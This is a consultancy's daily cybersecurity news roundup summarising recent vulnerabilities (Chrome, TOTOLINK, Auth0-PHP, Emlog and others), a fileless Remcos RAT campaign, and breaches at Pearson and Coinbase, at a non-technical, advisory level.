Good day and welcome to our daily cybersecurity roundup. Today’s bulletin covers an array of notable vulnerabilities, fileless attack campaigns and disruptive breaches across the digital landscape. Let’s dive straight into the details, keeping our tone both technical and friendly – much like a heated chat over a cuppa with an old acquaintance.
Fileless Remcos RAT via LNK Files and PowerShell
Security researchers have spotted Remcos RAT being deployed through a crafty fileless attack. The malicious campaign uses LNK shortcut files to trigger MSHTA.exe within PowerShell, skilfully evading traditional disk-based defences. This serves as a pressing reminder to maintain layered security measures, especially in detecting and neutralising memory-resident threats.
Google Chrome Update Patches Multiple Vulnerabilities
The latest Google Chrome update has rolled out fixes for critical flaws including CVE-2025-4372, CVE-2025-4664, and CVE-2025-2783, ensuring smooth and secure browsing. Regular updates like these highlight the necessity of keeping all your software up-to-date – an excellent habit for both personal users and companies with stringent compliance requirements.
Vulnerability Watch: Software, APIs and Network Devices
There’s been no shortage of action in the vulnerability space recently. Here’s a snapshot of some of the high-severity issues making headlines:
Lockfile Lint API (CVE-2025-4759)
Versions before 5.9.2 of the package are susceptible to an incorrect behaviour order vulnerability. Attackers can bypass early validations, potentially installing unintended npm packages. At a severity of 8.3, it’s a stark reminder for developers to always monitor dependency updates.
TOTOLINK A3002R/A3002RU Vulnerabilities
A series of critical buffer overflow vulnerabilities (CVE-2025-4733, CVE-2025-4732, CVE-2025-4731, and CVE-2025-4730) have been disclosed in TOTOLINK’s HTTP POST Request Handler. These vulnerabilities are triggered by manipulating parameters such as mac, ip6addr, service_type, and devicemac1, and they allow remote attacks that could compromise device integrity. With severities reaching up to 8.8, users of these devices should apply available patches or other mitigations as soon as possible.
Wibu CodeMeter Privilege Escalation (CVE-2025-47809)
This issue in Wibu CodeMeter before version 8.30a may allow local users to escalate privileges immediately after installation under specific conditions. With a severity of 8.2, organisations are advised to review and update their installations promptly.
Auth0-PHP Session Cookie Brute Force (CVE-2025-47275)
Auth0-PHP SDK versions from 8.0.0-BETA1 up to 8.14.0 suffer from vulnerability risks where session cookies can be brute forced. Given its critical severity of 9.1, upgrading to version 8.14.0 and rotating cookie encryption keys are highly recommended to prevent unauthorised access.
Spotify/Github Spotipy Untrusted Code Execution (CVE-2025-47928)
This vulnerability affects the Python library for the Spotify Web API via GitHub Actions. It allows malicious actors to potentially execute untrusted code with extensive privileges. With the risk to critical secrets like GITHUB_TOKEN, prompt remediation is essential, especially for open public repositories.
Emlog SQL Injection and Remote Code Execution (CVE-2025-47785)
An SQL injection flaw in Emlog’s admin interface may allow attackers to compromise the administrating credentials and perform remote code execution. Although confirmation of a patch is still pending, administrators should take precautionary measures to secure their platforms.
Dell PowerScale InsightIQ Privilege Escalation (CVE-2025-30475)
For users of Dell PowerScale InsightIQ (versions 5.0 to 5.2), an improper privilege management flaw could allow an unauthenticated remote attacker to escalate privileges. Organisations managing data-intensive environments should review their configurations immediately.
Cyber Attacks, Breaches and Industry Alerts
In addition to the vulnerabilities mentioned above, here are some broader cybersecurity events impacting industries globally:
Pearson Customer Data Breach
London-based education giant Pearson has confirmed a breach that compromised a portion of customer data. This incident highlights how even well-resourced companies can fall victim to sophisticated intrusions.
Coinbase Under Siege
Coinbase has warned of potential damages ranging between $180 million and $400 million following a cyber attack that targeted a limited set of customer accounts. In a twist of irony, Coinbase has also launched a generous $20 million bounty to help identify the group behind the attack. Such proactive measures underscore the need for robust threat-hunting capabilities.
New European Vulnerability Database
The EU has launched a government-backed vulnerability database as an alternative to the MITRE CVE system. This new resource aims to streamline the reporting and tracking of vulnerabilities—it’s another step toward a more resilient cybersecurity ecosystem.
Other Noteworthy Incidents
Recent alerts also include an SQL injection vulnerability in WebERP (CVE-2025-46052) and an alarming report of “endemic” ransomware prompting the NHS to demand enhanced cybersecurity measures from its suppliers. Meanwhile, a pro-Ukraine hacking group claims responsibility for a cyberattack that wiped out a third of Russia’s national electronic court archive. These stories collectively serve as a reminder that cyber threats are as diverse as they are relentless.
In a climate where threats evolve daily, staying informed and proactive is key to robust cybersecurity. Here at Synergos Consultancy, we’re passionate about helping businesses navigate these challenges – whether you’re seeking ISO compliance or need tailored advice to manage associated risks. Remember, a secure environment isn’t built overnight, but every informed decision counts.
Stay safe and vigilant, and join us again tomorrow as we sift through the latest cybersecurity developments.
